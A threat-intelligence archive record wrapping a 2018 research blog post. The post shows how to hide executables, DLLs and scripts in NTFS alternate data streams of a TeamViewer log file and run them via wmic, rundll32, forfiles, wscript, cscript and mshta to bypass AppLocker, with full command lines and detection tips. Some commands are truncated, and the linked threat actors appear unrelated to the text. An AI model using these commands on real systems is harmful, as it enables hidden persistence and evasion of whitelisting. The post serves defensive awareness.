{
	"id": "10994bb8-6c35-4caf-887c-f314367d31b5",
	"created_at": "2026-04-06T00:21:09.217573Z",
	"updated_at": "2026-04-10T13:11:19.062407Z",
	"deleted_at": null,
	"sha1_hash": "88f3b8ccf7c65faaca8c2d06e2aa814fff3bd2f9",
	"title": "Putting data in Alternate data streams and how to execute it",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 824158,
	"plain_text": "Putting data in Alternate data streams and how to execute it\r\nPublished: 2018-01-14 · Archived: 2026-04-05 19:38:01 UTC\r\nPart 2 of this research can be found here: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\r\nI always had a fascination about ADS (Alternate data streams) and using it as part of a persistence. My first\r\nmeeting with this as a persistence technique was when Matt Nelson aka @Enigma0x3 wrote a blogpost about\r\nusing it: https://enigma0x3.net/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/\r\nQuite recently I have started to play with AppLocker bypasses to create a tool and somehow I saw a shiny thing\r\nthat I just had to look at. I did a normal check on my AppLocker test system using Accesschk.exe and discovered a\r\nwritable file within the Teamviewer folder.\r\nA log file to be exact. This lead me to the discovery that you can inject data into the alternate stream of that file,\r\nexecute it and it will work as an AppLocker bypass.\r\nI posted a tweet about this here: https://twitter.com/Oddvarmoe/status/951757732557852673\r\n(Kudos to TeamViewer for looking into the issue from their side)\r\nHere is a screenshot of the bypass I found:\r\nSo what I did was that I first injected the payload into the ADS of the log file using this command:\r\nhttps://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/\r\nPage 1 of 6\n\n\"type c:\\temp\\bginfo.exe \u003e \"C:\\program files (x86)\\Teamviewer\\TeamViewer12_Logfile.log:bginfo.exe\"\r\nThen I used the following command to execute it:\r\n\"wmic process call create '\"C:\\program files (x86)\\Teamviewer\\TeamViewer12_Logfile.log:bginfo.exe\"'\r\nAfter I was done looking at this bypass I got even more curious. What sort of other processes are able to execute\r\nfrom ADS?\r\nI did some Googling around ADS and found out that back in the days you could use:\r\nstart c:\\folder\\file.exe:ADSStream.exe\r\nto launch executables from ADS.\r\nThis is now blocked.\r\nAfter some testing, searching and playing around I figured out the following, are at least possible to execute from\r\nADS (And I am sure that there are hundreds more as well):\r\nrundll32.exe\r\ntype \"C:\\temp\\messagebox64.dll\" \u003e \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:ADSDLL\r\nrundll32\"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:ADSDLL.dll\",DllMain\r\nMavinject.exe\r\nhttps://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/\r\nPage 2 of 6\n\nc:\\windows\\SysWOW64\\notepad.exe\r\ntasklist | findstr notepad\r\ntype C:\\temp\\AtomicTest.dll \u003e \"\"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:Atomic.dll\r\nC:\\windows\\WinSxS\\wow64_microsoft-Windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e\r\nForfiles.exe\r\nIn my testing forfiles is not very fond of spaces in paths. So it seems you have to use the 8.3 foldername for some\r\nreason.\r\nforfiles /P C:\\windows\\system32 /m notepad.exe /c \"c:\\Progra~2\\Teamviewer\\TeamViewer13_Logfile.log:bg\r\nWscript.exe\r\nhttps://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/\r\nPage 3 of 6\n\ntype \"C:\\Program Files\\test\\wscripthello.vbs\" \u003e \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfi\r\nwscript\"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:wscripts.vbs\"\r\nCscript.exe\r\ncscript\"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:wscripts.vbs\"\r\nMSHTA.exe\r\nhttps://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/\r\nPage 4 of 6\n\ntype C:\\temp\\helloworld.hta \u003e\r\nwscript\"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:hel\r\nmshta\"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:helloworld.hta\"\r\nI am pretty sure this is not everything that can execute from ADS. This is just some examples I found pretty fast\r\nwhile playing with it. My point with this post is to raise awareness of Alternate data streams. If you are not\r\nchecking for malicious activity within ADS of your files/folders I suggest you start. Thats it.\r\nUpdate 18.01.2018:\r\nI added these methods to a GIST found\r\nhere: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\r\nWill try to keep it updated when I discover new methods.\r\nI was also asked a lot about how to detect these alternate data streams. There are several utilities to view ADS.\r\nDir /r c:\\fileorfolder\r\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/streams\r\nhttps://www.nirsoft.net/utils/alternate_data_streams.html\r\nSysmon also offers some monitoring of ADS AFAIK.\r\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/sysmon\r\nhttps://twitter.com/SwiftOnSecurity/status/952659933836791808\r\nThere are also some PowerShell scripts that can be used.\r\nhttps://github.com/forgottentq/powershell/blob/master/find-steams.ps1\r\nhttps://github.com/p0shkatz/Get-ADS\r\nCheers!\r\nUpdate 29.08.2018:\r\nAnother great resource on ADS written by Marc Ochsenmeier can be found\r\nhere: https://winitor.com/pdf/NtfsAlternateDataStreams.pdf\r\nhttps://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/\r\nPage 5 of 6\n\nSource: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/\r\nhttps://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/"
	],
	"report_names": [
		"putting-data-in-alternate-data-streams-and-how-to-execute-it"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434869,
	"ts_updated_at": 1775826679,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/88f3b8ccf7c65faaca8c2d06e2aa814fff3bd2f9.pdf",
		"text": "https://archive.orkl.eu/88f3b8ccf7c65faaca8c2d06e2aa814fff3bd2f9.txt",
		"img": "https://archive.orkl.eu/88f3b8ccf7c65faaca8c2d06e2aa814fff3bd2f9.jpg"
	}
}